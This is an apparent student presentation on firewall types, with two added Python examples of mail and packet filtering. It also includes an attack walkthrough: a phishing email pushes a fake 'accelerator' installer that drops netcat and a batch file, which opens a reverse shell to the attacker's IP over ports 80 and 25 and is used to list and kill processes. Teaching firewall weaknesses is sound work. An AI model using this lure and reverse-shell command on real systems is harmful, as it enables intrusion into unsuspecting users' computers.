Firewall: Purpose, Types and Way of action
Advisor: Dr. Yitzhak Aviv. Submitted by: Uri Wieder. ID: 036851004
Introduction
Most organizations today have an internal network that interconnects their computer systems. There is usually a high degree of trust between the computer systems in the network, particularly if the network is private. However, many organizations now see the benefits of connecting to the Internet. But the Internet is inherently an insecure network.
So how can an organization or a private person securely connect to the Internet? Answer: the most secure and effective solution is to use a firewall.
What is a firewall?
A firewall is a secure Internet gateway, which is used to interconnect a private network to the Internet in a manner in which all incoming and outgoing packets have to pass through it, and it decides whether to accept or discard them.
There are a number of components that make up a firewall:
1. The Internet access security policy of the organization. This states, at a high level, what degree of security the organization expects when connecting to the Internet. The security policy is independent of technology and techniques, and should have a lifetime independent of the equipment used.
2. The mapping of the security policy onto technical designs and procedures that are to be followed when connecting to the Internet. This information will be updated as new technology is announced and as system configurations change. Technical designs are usually based on one of two security policies: either deny any service unless it is expressly permitted, or permit any service unless it is expressly denied. The former is clearly the more secure of the two.
3. The firewall system, which is the hardware and software that implements the firewall. Typical firewall systems comprise an IP packet filtering router and a host computer (sometimes called a bastion host or application gateway) running application filtering and authentication software.
Each of these firewall components is essential. A firewall system without an Internet access security policy cannot be correctly configured. A policy without enforced procedures is worthless, as it is ignored.
[Figure: the rule list of a Microsoft ISA firewall (used in large organizations)]
Packet filters
Packet filters work by dropping packets based on their source or destination addresses or port numbers. Little or no context is kept; decisions are made based solely on the contents of the current packet. Depending on the type of router, filtering may be done at the incoming interface, the outgoing interface or both. The administrator makes a list of the acceptable machines and services, with a stop list of unacceptable machines or services. It is easy to permit or deny access at the host or network level with a packet filter. For example, one can permit any IP access between hosts A and B, or deny any access to B from any machine but A. Packet filters work well for blocking spoofed packets, either incoming or outgoing.
[Figure: packet filter rule set example] This example fits the firewall philosophy: all that is not expressly permitted is prohibited.
Circuit-Level Gateways
Circuit-level gateways work at the TCP level. TCP connections are relayed through a computer that essentially acts as a wire. The relay computer runs a program that copies bytes between two connections, while perhaps logging or caching the contents. In this scheme, when a client wishes to connect to a server, it connects to a relay host and possibly supplies connection information through a simple protocol. The relay host, in turn, connects to the server. The name and IP address of the client are usually not available to the server, thereby not revealing information useful to hackers. The other side of the relay host emits normal, well-behaved TCP/IP packets. A major advantage of using this method is that non-requested data from outside the firewall is not allowed in, period!
Application-Level Filtering
A packet filter doesn't need to understand much about the traffic it is limiting. It looks at the source and destination addresses, and may peek into the UDP or TCP port numbers and flags. Application-level filters deal with the details of the particular service they are checking, and are usually more complex than packet filters. Rather than using a general-purpose mechanism to allow many different kinds of traffic to flow, special-purpose code can be used for each desired application.
For example, an application-level filter for mail will understand RFC 822 headers (a standard that specifies a syntax for text messages that are sent among computer users, within the framework of "electronic mail") and MIME-formatted attachments, and may well be able to identify virus-infected software. These filters are usually store-and-forward. Application gateways have another advantage that in some environments is quite critical: it is easy to log and control all incoming and outgoing traffic. Mail can be checked for "dirty words", indications that proprietary or restricted data is passing the gateway. Web queries can be checked for conformance with company policies, and dangerous mail attachments can be stripped off.
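The store-and-forward mail filter described above, worked through in Python as an added example that is not part of the original presentation; the dirty-word list, the extension list and the sample message are constructed, and the standard library's email parser stands in for the gateway's own RFC 822/MIME code.

```python
import email
from email import policy
from email.message import EmailMessage

# Constructed gateway policy, not values from the page.
DIRTY_WORDS = ("confidential", "internal only")
DANGEROUS_EXTENSIONS = (".exe", ".bat", ".scr")

def build_sample() -> bytes:
    """Constructed sample: a lure mail carrying an .exe and a harmless PDF."""
    m = EmailMessage()
    m["From"], m["To"] = "sender@example.com", "user@example.com"
    m["Subject"] = "Speed up software"
    m.set_content("Please install the attached accelerator. INTERNAL ONLY.")
    m.add_attachment(b"MZ\x90\x00", maintype="application",
                     subtype="octet-stream", filename="accelerator soft.exe")
    m.add_attachment(b"%PDF-1.4", maintype="application", subtype="pdf",
                     filename="notes.pdf")
    return m.as_bytes()

def inspect_mail(raw: bytes) -> dict:
    """Store-and-forward check: parse headers and MIME parts, flag dirty words
    in the text body, drop executable attachments, rebuild a clean message."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    findings = {"dirty_words": [], "stripped": []}
    body, kept = "", []
    for part in msg.walk():
        if part.is_multipart():
            continue                      # containers carry no content
        fname = part.get_filename()
        if fname and fname.lower().endswith(DANGEROUS_EXTENSIONS):
            findings["stripped"].append(fname)   # never forwarded
        elif fname:
            kept.append(part)
        elif part.get_content_type() == "text/plain":
            body += part.get_content()
    findings["dirty_words"] = [w for w in DIRTY_WORDS if w in body.lower()]
    clean = EmailMessage()
    for h in ("From", "To", "Subject"):
        if msg[h] is not None:
            clean[h] = str(msg[h])
    clean.set_content(body)
    for part in kept:
        clean.add_attachment(part.get_content(),
                             maintype=part.get_content_maintype(),
                             subtype=part.get_content_subtype(),
                             filename=part.get_filename())
    findings["message"] = clean
    return findings
```

The findings dictionary is what the gateway would log; the rebuilt message is what it would forward.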
Hacking a computer while bypassing a firewall: scenario
In order to perform my malicious act, I have used the following tools, which I will expand on later in this passage:
Netcat tool: a utility that is able to write and read data across TCP and UDP network connections. If you are responsible for network or system security, it is essential that you understand the capabilities of Netcat. Netcat can be used as a port scanner, a backdoor, a port redirector, a port listener and lots of other network administration tools.
Social engineering: social engineering attacks take place on two levels, the physical and the psychological. The purpose of this attack is basically to convince the person being attacked that it is in his best interest to oblige the attacker's request or action.
A netcat script file: a script written in order to get the "attacked computer" to establish a connection with the attacking computer while bypassing the firewall, in order to perform the hack.
In this scenario the Windows firewall is turned on, meaning that all ports are closed! The purpose of this hack is to see all of the unsuspecting user's tasks, and close one of them down.
First step
Using social engineering, we have convinced this innocent person that he has been given the opportunity to try new software that will benefit his Internet traffic, when in fact he will be the one responsible for creating a security breach in his system by downloading this malicious software, which will infect it with the netcat tool and the script file.
[Figure: e-mail containing the address of the site hosting the "software accelerator"; subject "Speed up software", sent to unsuspectinguser@gmail.com]
After downloading the "software" file, called accelerator soft.exe, the user is then instructed to open it and follow the setup wizard instructions. When the user performs the installation process he is extracting two files into a folder at c:\ps: 1. netcat.exe, the netcat tool; 2. speed.bat, the netcat script file.
When the wizard process is finished it will run the speed.bat script file, which contains the following line:
c:\ps\netcat.exe 172.20.71.106 80 | cmd.exe | c:\ps\netcat.exe 172.20.71.106 25
The first portion (c:\ps\netcat.exe 172.20.71.106 80, highlighted in red on the slide) means that the netcat utility opens a connection to port 80 on the attacking computer, in order to receive commands from it. The second portion (cmd.exe, highlighted in green) is the command interpreter that will be used by the attacking computer in order to send commands to the attacked computer. The third portion (c:\ps\netcat.exe 172.20.71.106 25, highlighted in grey) means that the netcat utility opens a connection to port 25 on the attacking computer in order to send it the output of the attacked computer.
This script, using the netcat tool, opens a TCP connection to the attacking computer, whose IP address is 172.20.71.106, on two ports: 80 and 25. Because both ports are well-known ports in common use, where 80 is the HTTP port and 25 is the SMTP port, they will not be blocked by the Windows firewall, and all data passing through them will be allowed.
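The packet filter rule set from the earlier section and the well-known-port bypass just described, worked through in Python as an added example that is not part of the original presentation. All addresses and both rule sets are constructed: a default-deny filter is applied once with a policy that mirrors the host firewall in the scenario (every inbound port closed, any outbound connection allowed) and once with a policy that also restricts egress to a web proxy and a mail relay, which is the kind of rule that stops a workstation from dialing out on tcp/80 or tcp/25.

```python
from dataclasses import dataclass
from ipaddress import ip_address, ip_network
from typing import List, Optional

# Constructed addresses (documentation ranges), not the hosts from the page.
PROXY, MAIL_RELAY, WORKSTATION, OUTSIDE = (
    "192.0.2.2", "192.0.2.3", "192.0.2.9", "203.0.113.5")
@dataclass(frozen=True)
class Packet:
    src: str
    dst: str
    proto: str      # "tcp" or "udp"
    dport: int
    direction: str  # "in" (Internet -> LAN) or "out" (LAN -> Internet)

@dataclass(frozen=True)
class Rule:
    action: str               # "permit" or "deny"
    direction: str            # "in", "out" or "any"
    src: str = "0.0.0.0/0"
    dst: str = "0.0.0.0/0"
    proto: str = "any"
    dport: Optional[int] = None  # None matches every destination port

    def matches(self, p: Packet) -> bool:
        return (self.direction in ("any", p.direction)
                and ip_address(p.src) in ip_network(self.src)
                and ip_address(p.dst) in ip_network(self.dst)
                and self.proto in ("any", p.proto)
                and self.dport in (None, p.dport))

def filter_packet(rules: List[Rule], p: Packet) -> str:
    """First matching rule wins; no context is kept between packets."""
    for r in rules:
        if r.matches(p):
            return r.action
    return "deny"  # all that is not expressly permitted is prohibited

# Policy 1 mirrors the host firewall in the scenario: every inbound port is
# closed, but any outbound connection, e.g. to tcp/80 or tcp/25, is allowed.
INBOUND_ONLY = [Rule("permit", "out")]
# Policy 2 adds egress filtering: only the web proxy may reach tcp/80 and only
# the mail relay may speak tcp/25, so a workstation has no direct path out.
EGRESS_FILTERED = [
    Rule("permit", "out", src=PROXY, proto="tcp", dport=80),
    Rule("permit", "out", src=MAIL_RELAY, proto="tcp", dport=25),
    Rule("permit", "in", dst=MAIL_RELAY, proto="tcp", dport=25),
]
# The scenario's reverse connection: a workstation dialing out to tcp/80.
CALLBACK = Packet(WORKSTATION, OUTSIDE, "tcp", 80, "out")
```

Under INBOUND_ONLY the callback is permitted, which is exactly the gap the scenario exploits; under EGRESS_FILTERED it falls through to the default deny.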
Next step: we will go over what happens on the attacker's side. The hacker is going to open two command prompt windows, one listening (waiting) for a connection on port 80 and the other listening (waiting) for a connection on port 25. In the first window the hacker will type the following line:
Netcat -vv -l -p 80
Let's break this line down: -vv means that we are going into ultra verbose mode, meaning that all data that goes through this connection will be displayed on the command prompt window. -l -p 80 means that the hacker has created a TCP port listening for a connection from another computer on port 80.
In the second window the hacker will type the following line:
Netcat -vv -l -p 25
This line has the same functionality as the first one, with the exception that the port awaiting a connection is port 25. If the hacker is situated behind a router in a LAN, he will have to create port forwarding rules in his router firewall so that the packets reaching his router on ports 80 and 25 are redirected to his station.
Once the two windows are open, the hacker only has to wait for the "speed" script in the batch file to be activated, so that the connection between the two computers is established. After the connection between the two computers is established, the hacker will use a DOS command, tasklist; this command will give the attacker the attacked computer's entire task list.
After doing so the hacker will choose any one of the active tasks he would like to terminate, using the DOS command taskkill /F /IM [process identification number]. Mission accomplished! The process representing a program has been closed down and the hacker has been informed that the process has been successfully terminated.
Analysis of the hack
In this analysis I have performed the hack between two computers: the attacking computer, whose IP address is 172.20.71.106, and the attacked computer, whose IP address is 172.20.71.109. First we will see the TCP three-way handshake between the two computers. This connection, as mentioned earlier, was initiated by the attacked computer.
[Figure: the source code of netcat used to perform the hack (written in VC++ 6)]
[Figure: the sockets that have been opened on ports 25 and 80]
[Figure: the attacked side's packets used to establish the connection]
[Figure: the attacking side sends a confirmation of the establishment request]
[Figure: afterwards the attacked computer sends information about its operating system]
Now that the connection is set, the hacker can get the attacked computer's task list on port 80 (the port on which commands are sent) in order to select the process he wants to kill.
[Figure: the attacked computer task list request]
[Figure: the attacked computer responds and sends the computer's entire task list]
• After receiving the task list the hacker can now choose to shut down whatever task he wishes, using the taskkill command that was referred to earlier.
In Conclusion
• The firewall provides a feeling of increased security, that your organization's or personal computer's contents are being protected.
• There are a few types of firewalls, and combining them all into one product will ensure maximum protection.
• Some firewalls are not up to the task of providing full protection; therefore the constant search for newer and better firewalls is in everyone's best interest.